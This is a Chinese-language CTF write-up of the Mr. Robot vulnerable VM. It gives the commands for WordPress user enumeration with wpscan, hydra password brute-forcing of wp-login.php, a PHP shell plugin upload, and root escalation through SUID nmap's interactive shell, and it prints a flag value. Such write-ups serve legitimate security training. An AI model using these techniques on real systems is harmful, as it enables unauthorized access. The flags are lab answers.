Video地址

爆wp信息工具wpscan

1
wpscan --url 192.168.1.192 --enumerate u # enumerate 枚举 u 用户名

发现站点里有wordpress目录
发现站点更目录文件
一个robots.txt 一个readme.txt

查看robots.txt内容

1
cat robots.txt

发现fsocity.dic和key-1-of-3.txt

1
2
cat fsocity.dic | wc -l # 回显有字典文件八万多条
cat key-1-of-3.txt # flag1 找到

至此拿到了爆破用字典,结合wodpress目录,使用hydra爆破账号密码

1
hydra -L fewest.txt -P whocares 192.168.1.192 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid"

user字段为log password字段为pwd,通过burp抓包获取。通过fewest用户字典加随意密码whocares用hydra爆破尝试,结果获取到真实用户名为Elliot
明确用户名之后再次爆破

1
wpscan -u 192.168.1.192 --wordlist /root/Desktop/robots/fewest/txt --username elliot

获取到密码ER28-0652,成功登录网站后台
通过phpshell插件获取terminal
使用 phpshell.zip上传安装插件,再通过端口监听获取到terminal
在/home/robot目录下获取到password文件和一个flag2(需要高权限才能打开)
但是获取到的robot密码不能使其跳转为管理员用户,提示需要一个真实的terminal

1
python -c "import pty;pty.spawn('/bing/bash');"

从而获取到真实terminal,通过robot:password成为robot用户,flag2成功读取
寻找flag3

1
find / -name flag-3-of-3.txt #权限不够搜索不到

发现nmap目录具有root权限 (SUID权限相关知识点)

1
2
3
4
5
6
7
8
9
nmap --interactive
nmap> !sh
!sh
# cd /root/
cd /root/
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
#

flag-3-of-3z在/root目录下找到

相关writeup:
http://www.linkedin.com/pulse/vulnerable-vm-mr-robot-1-ctf-walkthrough-dehvon-curtis
https://bryceandress.github.io/2016/07/02/Mr-Robot-CTF.html
http://uart.io/2016/08/mr-robot-vulnhub-vm-writeup/